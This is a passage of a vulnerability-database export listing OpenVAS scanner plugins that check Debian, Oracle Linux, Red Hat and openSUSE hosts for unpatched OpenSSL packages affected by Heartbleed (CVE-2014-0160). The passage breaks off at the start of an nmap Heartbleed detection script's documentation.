"modified": "2019-03-18T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENVAS:1361412562310702896", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702896", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 14277 2019-03-18 14:45:38Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702896\");\n script_version(\"$Revision: 14277 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:45:38 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2896.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"openssl on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name:\"summary\", value:\"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-0376", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123430", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123430", "title": "Oracle Linux Local Check: ELSA-2014-0376", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0376.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123430\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:43 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0376\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0376 - openssl security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0376\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0376.html\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-03-20T16:44:18", "bulletinFamily": "scanner", "description": "A vulnerability has been discovered\nin OpenSSL", "modified": "2018-03-19T00:00:00", "published": "2014-04-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702896", "id": "OPENVAS:702896", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(702896);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2896.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "title": "RedHat Update for openssl RHSA-2014:0376-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-12-12T11:10:34", "bulletinFamily": "scanner", "description": "Check for the Version of update", "modified": "2017-12-08T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850582", "id": "OPENVAS:850582", "title": "SuSE Update for update openSUSE-SU-2014:0492-1 (update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0492_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for update openSUSE-SU-2014:0492-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850582);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:36:01 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:0492-1 (update)\");\n\n tag_insight = \"\n This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\";\n\n tag_affected = \"update on openSUSE 13.1, openSUSE 12.3\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0492_1\");\n script_summary(\"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-07-17T14:28:49", "bulletinFamily": "scanner", "description": "OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT ", "modified": "2019-07-05T00:00:00", "published": "2014-04-09T00:00:00", "id": "OPENVAS:1361412562310105010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105010", "title": "OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability STARTTLS Check\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105010\");\n script_version(\"2019-07-05T10:04:07+0000\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:04:07 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_starttls_pop3.nasl\", \"gb_starttls_imap.nasl\", \"gb_starttls_ftp.nasl\", \"gb_starttls_smtp.nasl\",\n \"gb_postgres_tls_support.nasl\", \"gb_starttls_xmpp.nasl\", \"gb_starttls_nntp.nasl\", \"gb_starttls_ldap.nasl\");\n script_mandatory_keys(\"ssl_tls/port\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT 'OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability' (OID: 1.3.6.1.4.1.25623.1.0.103936).\");\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:58", "bulletinFamily": "scanner", "description": "Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n\n## Script Arguments \n\n#### ssl-heartbleed.protocols \n\n(default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns 